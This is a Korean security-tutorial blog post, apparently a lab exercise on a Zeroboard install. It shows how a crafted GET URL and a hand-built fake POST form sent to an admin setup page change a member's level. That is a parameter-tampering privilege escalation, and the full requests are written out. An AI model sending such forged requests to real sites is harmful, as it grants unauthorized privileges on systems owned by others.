본문 바로가기
WEB_Security

13. GET,POST 취약점

by Jnamelight 2017. 5. 30.

예제


GET,POST 의 취약점을 알아내서 현재 가입된 회원의 등급을 1등급으로 만들어 보도록 해보자.




현재 가능한건 관리자 권한에서 소스를 분석하여 어떤 변수를 넘겨서 변경되는지 알아야한다.

그럼 위와같은 페이지( 관리자 권한이 있는 ) 로 들어가서 소스를 분석해보자.




분석 결과 위와같이 post 형식으로 각각의 변수에 값을 넘기는것을 확인할수 있었다.


page =1            // 현재 회원 가입 페이지 group_no =1        // 현재 그룹   

exec =view_member     page_num =10         exec2 =moveall    // 변경시 변경완료 변수 cart[] =2        movelevel=1  // level 변수


현재 분석할수 있는 내용을 분석한 결과이다.

이방식으로 일단 GET방식으로 정보를 넘겨 등급을 1등급으로 만들어보자.



http://58.120.80.40/zboard/admin_setup.php? page=1&group_no=1&exec=view_member&page_num=10& exec2=moveall&cart[]=2&movelevel=1

GET 방식을 이용해서 위와같은 URL을 넘기면 각각의 값이 들어가 등급이 변할 것이다.



위와같은 결과로 출력 되는것을 확인할수 있다 ( GET 취약점 )


<form method=POST action='http://58.120.80.40/zboard/admin_setup.php'> <input type=text name=page value=1> <input type=text name=group_no value=1> <input type=text name=exec value=view_member> <input type=text name=page_num value=10> <input type=text name=exec2 value=moveall> <input type=text name=cart[] value=2> <input type=text name=movelevel value=9> <input type=submit value=send>


이번에는 페이크 form 을 만들어서 레벨을 9로 만들어보자, 위와같은 형태를 만든뒤 POST 형식으로 넘기자.



위와 같이 개발자 도구를 통해서 페이크 폼 형태의 정보를 넘기자.



그럼 위와같은 형태의 form이 나오게 된다. 이정보들을 보내면



그럼 위와같이 레벨이 변경되는 것을 알수있다






'WEB_Security' 카테고리의 다른 글

15. PHP 파일 업로드 취약점  (0) 2017.05.31
14. CSRF  (0) 2017.05.30
12. XSS 공격  (0) 2017.05.29
11. 제로보드 실습환경 구축  (0) 2017.05.26
10. 쿠키 & 세션  (0) 2017.05.24

댓글